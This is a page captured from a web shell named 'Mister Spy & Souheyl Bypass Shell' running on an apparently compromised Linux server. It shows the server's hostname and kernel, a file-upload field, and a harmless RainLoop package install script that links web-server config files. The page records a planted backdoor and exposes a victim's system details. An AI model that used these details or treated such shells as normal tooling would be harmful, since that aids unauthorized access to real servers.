Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/lib/dpkg/info/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : //var/lib/dpkg/info/rainloop.postinst

#!/bin/sh
set -e

#Copy sample config file for Nginx
if [ -d /etc/nginx/sites-available/ ]; then
	if [ ! -f /etc/nginx/sites-available/rainloop ]; then
		ln -s /etc/rainloop/rainloop.nginx.conf /etc/nginx/sites-available/rainloop
	fi
fi

#Copy sample config file for Apache2
if [ -d /etc/apache2/sites-available/ ]; then
	if [ ! -f /etc/apache2/sites-available/rainloop.conf ]; then
		ln -s /etc/rainloop/rainloop.apache.conf /etc/apache2/sites-available/rainloop.conf
	fi
fi



bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net